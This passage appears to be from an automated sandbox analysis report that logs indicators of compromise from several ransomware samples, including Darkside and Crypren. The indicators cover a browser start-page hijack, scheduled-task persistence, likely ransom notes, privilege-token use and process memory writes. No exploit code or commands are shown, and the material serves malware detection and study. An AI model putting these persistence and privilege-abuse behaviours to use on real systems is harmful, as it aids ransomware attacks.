Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.2345.com/?k1902203" | Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | csrss.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" | csrss.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" | csrss.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | csrss.exe
Modifies registry class 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | OpenWith.exe
Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | OpenWith.exe
Modifies registry key 1 TTPs 1 IoCs
pid Process 2636 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 1008 NOTEPAD.EXE 5664 NOTEPAD.EXE 5084 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8932 schtasks.exe 6320 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4572 taskmgr.exe 7356 OpenWith.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2792 HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeRestorePrivilege | 2784 | 7zFM.exe
Token: 35 | 2784 | 7zFM.exe
Token: SeSecurityPrivilege | 2784 | 7zFM.exe
Token: SeDebugPrivilege | 1312 | taskmgr.exe
Token: SeSystemProfilePrivilege | 1312 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 1312 | taskmgr.exe
Token: SeDebugPrivilege | 4572 | taskmgr.exe
Token: SeSystemProfilePrivilege | 4572 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 4572 | taskmgr.exe
Token: 33 | 1312 | taskmgr.exe
Token: SeIncBasePriorityPrivilege | 1312 | taskmgr.exe
Token: SeDebugPrivilege | 2592 | powershell.exe
Token: SeBackupPrivilege | 1704 | vssvc.exe
Token: SeRestorePrivilege | 1704 | vssvc.exe
Token: SeAuditPrivilege | 1704 | vssvc.exe
Token: SeDebugPrivilege | 648 | HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
Token: SeIncreaseQuotaPrivilege | 4008 | WMIC.exe
Token: SeSecurityPrivilege | 4008 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4008 | WMIC.exe
Token: SeLoadDriverPrivilege | 4008 | WMIC.exe
Token: SeSystemProfilePrivilege | 4008 | WMIC.exe
Token: SeSystemtimePrivilege | 4008 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4008 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4008 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4008 | WMIC.exe
Token: SeBackupPrivilege | 4008 | WMIC.exe
Token: SeRestorePrivilege | 4008 | WMIC.exe
Token: SeShutdownPrivilege | 4008 | WMIC.exe
Token: SeDebugPrivilege | 4008 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4008 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4008 | WMIC.exe
Token: SeUndockPrivilege | 4008 | WMIC.exe
Token: SeManageVolumePrivilege | 4008 | WMIC.exe
Token: 33 | 4008 | WMIC.exe
Token: 34 | 4008 | WMIC.exe
Token: 35 | 4008 | WMIC.exe
Token: 36 | 4008 | WMIC.exe
Token: 35 | 3404 | Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
Token: SeIncreaseQuotaPrivilege | 4008 | WMIC.exe
Token: SeSecurityPrivilege | 4008 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4008 | WMIC.exe
Token: SeLoadDriverPrivilege | 4008 | WMIC.exe
Token: SeSystemProfilePrivilege | 4008 | WMIC.exe
Token: SeSystemtimePrivilege | 4008 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4008 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4008 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4008 | WMIC.exe
Token: SeBackupPrivilege | 4008 | WMIC.exe
Token: SeRestorePrivilege | 4008 | WMIC.exe
Token: SeShutdownPrivilege | 4008 | WMIC.exe
Token: SeDebugPrivilege | 4008 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4008 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4008 | WMIC.exe
Token: SeUndockPrivilege | 4008 | WMIC.exe
Token: SeManageVolumePrivilege | 4008 | WMIC.exe
Token: 33 | 4008 | WMIC.exe
Token: 34 | 4008 | WMIC.exe
Token: 35 | 4008 | WMIC.exe
Token: 36 | 4008 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Token: SeSecurityPrivilege | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Token: SeTakeOwnershipPrivilege | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Token: SeLoadDriverPrivilege | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Token: SeSystemProfilePrivilege | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2784 7zFM.exe 2784 7zFM.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 1312 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe 4572 taskmgr.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
pid Process 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 6524 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe 7356 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1312 wrote to memory of 4572 | 1312 | taskmgr.exe | 97
PID 1312 wrote to memory of 4572 | 1312 | taskmgr.exe | 97
PID 2592 wrote to memory of 4956 | 2592 | powershell.exe | 112
PID 2592 wrote to memory of 4956 | 2592 | powershell.exe | 112
PID 4956 wrote to memory of 648 | 4956 | cmd.exe | 113
PID 4956 wrote to memory of 648 | 4956 | cmd.exe | 113
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 114
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 114
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 114
PID 4956 wrote to memory of 1824 | 4956 | cmd.exe | 115
PID 4956 wrote to memory of 1824 | 4956 | cmd.exe | 115
PID 4956 wrote to memory of 1824 | 4956 | cmd.exe | 115
PID 4956 wrote to memory of 2116 | 4956 | cmd.exe | 116
PID 4956 wrote to memory of 2116 | 4956 | cmd.exe | 116
PID 4956 wrote to memory of 2116 | 4956 | cmd.exe | 116
PID 4956 wrote to memory of 2080 | 4956 | cmd.exe | 118
PID 4956 wrote to memory of 2080 | 4956 | cmd.exe | 118
PID 4956 wrote to memory of 2080 | 4956 | cmd.exe | 118
PID 4956 wrote to memory of 3128 | 4956 | cmd.exe | 119
PID 4956 wrote to memory of 3128 | 4956 | cmd.exe | 119
PID 4956 wrote to memory of 3128 | 4956 | cmd.exe | 119
PID 4728 wrote to memory of 5024 | 4728 | HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe | 122
PID 4728 wrote to memory of 5024 | 4728 | HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe | 122
PID 4728 wrote to memory of 5024 | 4728 | HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe | 122
PID 4956 wrote to memory of 1056 | 4956 | cmd.exe | 121
PID 4956 wrote to memory of 1056 | 4956 | cmd.exe | 121
PID 4956 wrote to memory of 3448 | 4956 | cmd.exe | 124
PID 4956 wrote to memory of 3448 | 4956 | cmd.exe | 124
PID 4956 wrote to memory of 3448 | 4956 | cmd.exe | 124
PID 4956 wrote to memory of 2792 | 4956 | cmd.exe | 125
PID 4956 wrote to memory of 2792 | 4956 | cmd.exe | 125
PID 4956 wrote to memory of 2792 | 4956 | cmd.exe | 125
PID 4956 wrote to memory of 3088 | 4956 | cmd.exe | 126
PID 4956 wrote to memory of 3088 | 4956 | cmd.exe | 126
PID 4956 wrote to memory of 3088 | 4956 | cmd.exe | 126
PID 5024 wrote to memory of 844 | 5024 | wscript.exe | 131
PID 5024 wrote to memory of 844 | 5024 | wscript.exe | 131
PID 5024 wrote to memory of 844 | 5024 | wscript.exe | 131
PID 4956 wrote to memory of 1264 | 4956 | cmd.exe | 133
PID 4956 wrote to memory of 1264 | 4956 | cmd.exe | 133
PID 4956 wrote to memory of 1264 | 4956 | cmd.exe | 133
PID 2080 wrote to memory of 3440 | 2080 | HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe | 135
PID 2080 wrote to memory of 3440 | 2080 | HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe | 135
PID 4956 wrote to memory of 4996 | 4956 | cmd.exe | 137
PID 4956 wrote to memory of 4996 | 4956 | cmd.exe | 137
PID 4956 wrote to memory of 4996 | 4956 | cmd.exe | 137
PID 3440 wrote to memory of 4008 | 3440 | cmd.exe | 138
PID 3440 wrote to memory of 4008 | 3440 | cmd.exe | 138
PID 4956 wrote to memory of 4736 | 4956 | cmd.exe | 139
PID 4956 wrote to memory of 4736 | 4956 | cmd.exe | 139
PID 4956 wrote to memory of 4736 | 4956 | cmd.exe | 139
PID 4736 wrote to memory of 3404 | 4736 | Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe | 140
PID 4736 wrote to memory of 3404 | 4736 | Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe | 140
PID 4736 wrote to memory of 3404 | 4736 | Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe | 140
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 141
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 141
PID 4956 wrote to memory of 4728 | 4956 | cmd.exe | 141
PID 4728 wrote to memory of 5296 | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe | 142
PID 4728 wrote to memory of 5296 | 4728 | Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe | 142
PID 4956 wrote to memory of 5520 | 4956 | cmd.exe | 144
PID 4956 wrote to memory of 5520 | 4956 | cmd.exe | 144
PID 4956 wrote to memory of 5520 | 4956 | cmd.exe | 144
PID 844 wrote to memory of 2636 | 844 | cmd.exe | 146
PID 844 wrote to memory of 2636 | 844 | cmd.exe | 146
System policy modification 1 TTPs 2 IoCs
description | ioc | Process
